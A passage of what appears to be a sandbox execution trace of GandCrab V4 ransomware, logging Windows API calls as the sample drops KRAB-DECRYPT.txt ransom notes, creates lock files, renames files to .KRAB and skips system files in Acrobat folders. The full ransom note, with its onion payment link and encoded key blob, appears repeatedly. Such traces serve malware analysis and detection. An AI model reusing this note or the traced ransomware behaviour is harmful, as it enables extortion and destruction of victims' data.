param_2="%s\\KRAB-DECRYPT.txt" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\\\KRAB-DECRYPT.txt") returned 72 [0055.936] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\\\KRAB-DECRYPT.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\adobe\\acrobat\\dc\\krab-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x44c [0055.947] lstrlenW (lpString="---= GANDCRAB V4 =--- \r\r\n\r\r\nAttention! \r\r\nAll your files, documents, photos, databases and other important files are encrypted and have the extension: .KRAB \r\r\nThe only method of recovering files is to purchase an unique private key. Only we can give you this key and only we can recover your files.\r\n\r\r\nThe server with your key is in a closed network TOR. You can get there by the following ways:\r\n\r\n----------------------------------------------------------------------------------------\r\r\n| 0. Download Tor browser - https://www.torproject.org/ \r\r\n| 1. Install Tor browser \r\n| 2. Open Tor Browser \r\n| 3. Open link in TOR browser: http://gandcrabmfe6mnef.onion/dce1bb8bd2ca4def \r\n| 4. Follow the instructions on this page \r\r\n---------------------------------------------------------------------------------------- \r\n \r\r\nOn our page you will see instructions on payment and get the opportunity to decrypt 1 file for free. \r\r\n\r\nATTENTION!\r\r\nIN ORDER TO PREVENT DATA DAMAGE:\r\n\r\n* DO NOT MODIFY ENCRYPTED FILES\r\n* DO NOT CHANGE DATA BELOW\r\n\r\n---BEGIN GANDCRAB KEY---\r\n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\r\n---END GANDCRAB KEY---\r\n\r\n---BEGIN PC DATA---\r\nwfKD6iudumBkmpL8IRr4U4WxPFasOVPtwzxuOrz15VYnvLCWAh5YYedd8JZ0TohRkHY+7lVWgLeoTG2H6B5UBLbzu9M274X6G0GXDCriMpJ288/FKv/amF6obpAeLpej5fxw2X3xAZKuipuhf0T/Aq8AmLZ0OOqX4bnabVckN3QybYaW5sCbYapYDKSRxsQpKY4m29eAXVK1ZEZVsQONuUHcKCJJ2P+MK0OxMKkPxYoALGmTApxSmtAoT3Z6P6Q/GfqS1pdzxDbVjd1AG3hpl55nRN0JCAMxfQ7GDJ0r+X0/Si/FGQ/ukeotJdiuqcCnrbrH57Rit7F/kRzBs+Lx/2c2Q+t0GtNYPlrXBiXt/hGHEd0b9SdH4o+4Laa5Y59yPYyu2Qiiy5RtTRYqBlPKJPYJzJFtwNYoDRPKnK0+De5cAL2fimEyg6RrIA32xA9Kxw7zZibpCBFJ3vTLMeag1wIZNXQARgyKKDnc1lDgdH8NmV7f2yy3QRtn8rJ3lpuw5nIKVY/pfTfifFIcKcAhPzVN238JQy/C1qZGEv3tLUi+BdhMPpGxHsMOI7+QRdQP94kvV//uurM=\r\n---END PC DATA---") returned 4023 [0055.947] WriteFile (in: hFile=0x44c, lpBuffer=0x2f20000*, nNumberOfBytesToWrite=0x1f6e, lpNumberOfBytesWritten=0x338e820, lpOverlapped=0x0 | out: lpBuffer=0x2f20000*, lpNumberOfBytesWritten=0x338e820*=0x1f6e, lpOverlapped=0x0) returned 1 [0055.948] CloseHandle (hObject=0x44c) returned 1 [0055.948] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0055.949] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x3030000 [0055.949] GetSystemTime (in: lpSystemTime=0x3030400 | out: lpSystemTime=0x3030400*(wYear=0x7e2, wMonth=0x7, wDayOfWeek=0x4, wDay=0x5, wHour=0xd, wMinute=0x2d, wSecond=0x3, wMilliseconds=0x9b)) [0055.949] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x35f0000 [0055.950] GetWindowsDirectoryW (in: lpBuffer=0x35f0000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0055.950] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x35f0200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x35f0600, lpMaximumComponentLength=0x35f0608, lpFileSystemFlags=0x35f0604, lpFileSystemNameBuffer=0x35f0400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x35f0600*=0xd2ca4def, lpMaximumComponentLength=0x35f0608*=0xff, lpFileSystemFlags=0x35f0604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0055.950] wsprintfW (in: param_1=0x3030000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\d2ca4a08d2ca4dee3d.lock") returned 78 [0055.950] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\d2ca4a08d2ca4dee3d.lock" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\adobe\\acrobat\\dc\\d2ca4a08d2ca4dee3d.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x44c [0056.122] VirtualFree (lpAddress=0x35f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0056.122] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0056.122] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\") returned 55 [0056.123] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\", lpString2="*" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\*" [0056.123] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\*", lpFindFileData=0x338e850 | out: lpFindFileData=0x338e850) returned 0xfbd760 [0056.123] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0056.123] FindNextFileW (in: hFindFile=0xfbd760, lpFindFileData=0x338e850 | out: lpFindFileData=0x338e850) returned 1 [0056.123] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0056.123] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0056.123] FindNextFileW (in: hFindFile=0xfbd760, lpFindFileData=0x338e850 | out: lpFindFileData=0x338e850) returned 1 [0056.123] lstrcmpW (lpString1="Collab", lpString2=".") returned 1 [0056.123] lstrcmpW (lpString1="Collab", lpString2="..") returned 1 [0056.123] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\", lpString2="Collab" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\Collab") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\Collab" [0056.123] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\Collab", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\Collab\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\Collab\\" [0056.124] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x3030000 [0056.124] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x3030000, csidl=42, fCreate=0 | out: pszPath="C:\\Program Files (x86)") returned 1 [0056.124] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x3030000, csidl=43, fCreate=0 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 1 [0056.124] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x3030000, csidl=36, fCreate=0 | out: pszPath="C:\\Windows") returned 1 [0056.124] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x3030000, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0056.124] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0056.124] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x3030000 [0056.125] wsprintfW (in: param_1=0x3030200, param_2="%s\\KRAB-DECRYPT.txt" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\Collab\\\\KRAB-DECRYPT.txt") returned 79 [0056.125] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\Collab\\\\KRAB-DECRYPT.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\adobe\\acrobat\\dc\\collab\\krab-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x454 [0056.151] lstrlenW (lpString="---= GANDCRAB V4 =--- \r\r\n\r\r\nAttention! \r\r\nAll your files, documents, photos, databases and other important files are encrypted and have the extension: .KRAB \r\r\nThe only method of recovering files is to purchase an unique private key. Only we can give you this key and only we can recover your files.\r\n\r\r\nThe server with your key is in a closed network TOR. You can get there by the following ways:\r\n\r\n----------------------------------------------------------------------------------------\r\r\n| 0. Download Tor browser - https://www.torproject.org/ \r\r\n| 1. Install Tor browser \r\n| 2. Open Tor Browser \r\n| 3. Open link in TOR browser: http://gandcrabmfe6mnef.onion/dce1bb8bd2ca4def \r\n| 4. Follow the instructions on this page \r\r\n---------------------------------------------------------------------------------------- \r\n \r\r\nOn our page you will see instructions on payment and get the opportunity to decrypt 1 file for free. \r\r\n\r\nATTENTION!\r\r\nIN ORDER TO PREVENT DATA DAMAGE:\r\n\r\n* DO NOT MODIFY ENCRYPTED FILES\r\n* DO NOT CHANGE DATA BELOW\r\n\r\n---BEGIN GANDCRAB KEY---\r\n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\r\n---END GANDCRAB KEY---\r\n\r\n---BEGIN PC DATA---\r\nwfKD6iudumBkmpL8IRr4U4WxPFasOVPtwzxuOrz15VYnvLCWAh5YYedd8JZ0TohRkHY+7lVWgLeoTG2H6B5UBLbzu9M274X6G0GXDCriMpJ288/FKv/amF6obpAeLpej5fxw2X3xAZKuipuhf0T/Aq8AmLZ0OOqX4bnabVckN3QybYaW5sCbYapYDKSRxsQpKY4m29eAXVK1ZEZVsQONuUHcKCJJ2P+MK0OxMKkPxYoALGmTApxSmtAoT3Z6P6Q/GfqS1pdzxDbVjd1AG3hpl55nRN0JCAMxfQ7GDJ0r+X0/Si/FGQ/ukeotJdiuqcCnrbrH57Rit7F/kRzBs+Lx/2c2Q+t0GtNYPlrXBiXt/hGHEd0b9SdH4o+4Laa5Y59yPYyu2Qiiy5RtTRYqBlPKJPYJzJFtwNYoDRPKnK0+De5cAL2fimEyg6RrIA32xA9Kxw7zZibpCBFJ3vTLMeag1wIZNXQARgyKKDnc1lDgdH8NmV7f2yy3QRtn8rJ3lpuw5nIKVY/pfTfifFIcKcAhPzVN238JQy/C1qZGEv3tLUi+BdhMPpGxHsMOI7+QRdQP94kvV//uurM=\r\n---END PC DATA---") returned 4023 [0056.151] WriteFile (in: hFile=0x454, lpBuffer=0x2f20000*, nNumberOfBytesToWrite=0x1f6e, lpNumberOfBytesWritten=0x338e5a0, lpOverlapped=0x0 | out: lpBuffer=0x2f20000*, lpNumberOfBytesWritten=0x338e5a0*=0x1f6e, lpOverlapped=0x0) returned 1 [0056.152] CloseHandle (hObject=0x454) returned 1 [0056.153] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0056.153] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x3030000 [0056.153] GetSystemTime (in: lpSystemTime=0x3030400 | out: lpSystemTime=0x3030400*(wYear=0x7e2, wMonth=0x7, wDayOfWeek=0x4, wDay=0x5, wHour=0xd, wMinute=0x2d, wSecond=0x3, wMilliseconds=0x166)) [0056.153] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x35f0000 [0056.154] GetWindowsDirectoryW (in: lpBuffer=0x35f0000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0056.154] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x35f0200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x35f0600, lpMaximumComponentLength=0x35f0608, lpFileSystemFlags=0x35f0604, lpFileSystemNameBuffer=0x35f0400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x35f0600*=0xd2ca4def, lpMaximumComponentLength=0x35f0608*=0xff, lpFileSystemFlags=0x35f0604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0056.154] wsprintfW (in: param_1=0x3030000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\Collab\\d2ca4a08d2ca4dee3d.lock") returned 85 [0056.154] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\Collab\\d2ca4a08d2ca4dee3d.lock" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\adobe\\acrobat\\dc\\collab\\d2ca4a08d2ca4dee3d.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x454 [0056.163] VirtualFree (lpAddress=0x35f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0056.163] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0056.164] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\Collab\\") returned 62 [0056.164] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\Collab\\", lpString2="*" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\Collab\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\Collab\\*" [0056.164] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\Collab\\*", lpFindFileData=0x338e5d0 | out: lpFindFileData=0x338e5d0) returned 0xfbe0a0 [0056.164] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0056.164] FindNextFileW (in: hFindFile=0xfbe0a0, lpFindFileData=0x338e5d0 | out: lpFindFileData=0x338e5d0) returned 1 [0056.164] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0056.164] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0056.164] FindNextFileW (in: hFindFile=0xfbe0a0, lpFindFileData=0x338e5d0 | out: lpFindFileData=0x338e5d0) returned 1 [0056.164] lstrcmpW (lpString1="d2ca4a08d2ca4dee3d.lock", lpString2=".") returned 1 [0056.164] lstrcmpW (lpString1="d2ca4a08d2ca4dee3d.lock", lpString2="..") returned 1 [0056.164] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\Collab\\", lpString2="d2ca4a08d2ca4dee3d.lock" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\Collab\\d2ca4a08d2ca4dee3d.lock") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\Collab\\d2ca4a08d2ca4dee3d.lock" [0056.164] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x3030000 [0056.164] wsprintfW (in: param_1=0x3030000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\Collab\\d2ca4a08d2ca4dee3d.lock.KRAB") returned 90 [0056.165] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\Collab\\d2ca4a08d2ca4dee3d.lock") returned 85 [0056.165] lstrlenW (lpString=".lock") returned 5 [0056.165] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x35f0000 [0056.165] wsprintfW (in: param_1=0x35f0000, param_2="%s " | out: param_1=".lock ") returned 6 [0056.165] VirtualFree (lpAddress=0x35f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0056.165] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0056.166] FindNextFileW (in: hFindFile=0xfbe0a0, lpFindFileData=0x338e5d0 | out: lpFindFileData=0x338e5d0) returned 1 [0056.166] lstrcmpW (lpString1="KRAB-DECRYPT.txt", lpString2=".") returned 1 [0056.166] lstrcmpW (lpString1="KRAB-DECRYPT.txt", lpString2="..") returned 1 [0056.166] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\Collab\\", lpString2="KRAB-DECRYPT.txt" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\Collab\\KRAB-DECRYPT.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\Collab\\KRAB-DECRYPT.txt" [0056.166] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x3030000 [0056.166] wsprintfW (in: param_1=0x3030000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\Collab\\KRAB-DECRYPT.txt.KRAB") returned 83 [0056.166] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\Collab\\KRAB-DECRYPT.txt") returned 78 [0056.166] lstrlenW (lpString=".txt") returned 4 [0056.166] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x35f0000 [0056.166] wsprintfW (in: param_1=0x35f0000, param_2="%s " | out: param_1=".txt ") returned 5 [0056.167] VirtualFree (lpAddress=0x35f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0056.167] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\Collab\\KRAB-DECRYPT.txt") returned 78 [0056.167] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\Collab\\KRAB-DECRYPT.txt") returned 78 [0056.167] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="desktop.ini") returned 1 [0056.167] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="autorun.inf") returned 1 [0056.167] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="ntuser.dat") returned -1 [0056.167] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="iconcache.db") returned 1 [0056.167] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="bootsect.bak") returned 1 [0056.167] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="boot.ini") returned 1 [0056.169] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="ntuser.dat.log") returned -1 [0056.169] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="thumbs.db") returned -1 [0056.169] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="KRAB-DECRYPT.html") returned 1 [0056.169] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="KRAB-DECRYPT.txt") returned 0 [0056.169] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0056.169] FindNextFileW (in: hFindFile=0xfbe0a0, lpFindFileData=0x338e5d0 | out: lpFindFileData=0x338e5d0) returned 0 [0056.169] FindClose (in: hFindFile=0xfbe0a0 | out: hFindFile=0xfbe0a0) returned 1 [0056.169] CloseHandle (hObject=0x454) returned 1 [0056.169] FindNextFileW (in: hFindFile=0xfbd760, lpFindFileData=0x338e850 | out: 